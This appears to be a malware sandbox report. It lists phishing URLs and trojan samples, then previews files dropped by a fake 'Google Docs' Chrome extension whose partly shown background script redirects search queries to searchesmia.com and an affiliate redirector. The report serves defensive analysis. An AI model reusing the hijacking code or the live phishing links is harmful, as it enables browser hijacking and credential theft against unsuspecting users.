                                                                                                                  https://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2f271439.cobirosite.com&umid=f16b4cf0-c742-11ed-8159-000d3a3a98a4&auth=c2a56d6141a8692d9b5d791c68c527956ffb37c9-ff3e408d549b1d6d7c46279eef2cb8bc73dd19dfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.21.54.42
                                                                                                                  https://www.youtube.com/attribution_link?c=coachblog-ytm-acq-int-blog-txt-coach&u=https%3A%2F%2Fbomberosbarcelonaquindio.org%2Fnew%2Fauth%2F/itqpxu%2F%2F%2F%2Ftest.test@test.com%3Fid%3Dcom.google.android.apps.youtube.musicGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  Siparis_584801571.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  https://www.youtube.com/attribution_link?c=coachblog-ytm-acq-int-blog-txt-coach&u=https%3A%2F%2Fbomberosbarcelonaquindio.org%2Fnew%2Fauth%2F/lqnobz%2F%2F%2F%2Fmichael.giantomaso@phillyshipyard.com%3Fid%3Dcom.google.android.apps.youtube.musicGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  HSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 172.67.153.85
                                                                                                                  https://s3.amazonaws.com/appforest_uf/f1679316986431x498434839476354500/b33bsign.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.21.235.2
                                                                                                                  DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 1.13.186.125
                                                                                                                  oeillet.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                  • 162.159.134.233
                                                                                                                  Svrz Docusign 728.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  14DQLvW18s.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  3.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.130.58
                                                                                                                  3.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.3.44
                                                                                                                  Image to PDF - PDF Maker_1.4.5_Apkpure.apkGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  3.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.3.44
                                                                                                                  27671221_961.42167489.905779.46094.lNk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.16.124.96
                                                                                                                  Image to PDF - PDF Maker_1.4.5_Apkpure.apkGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  Curium Pharma_Resource_Pol5641Guidelines_and_Initialing Instructions__200323.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  http://concur.parsfn.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
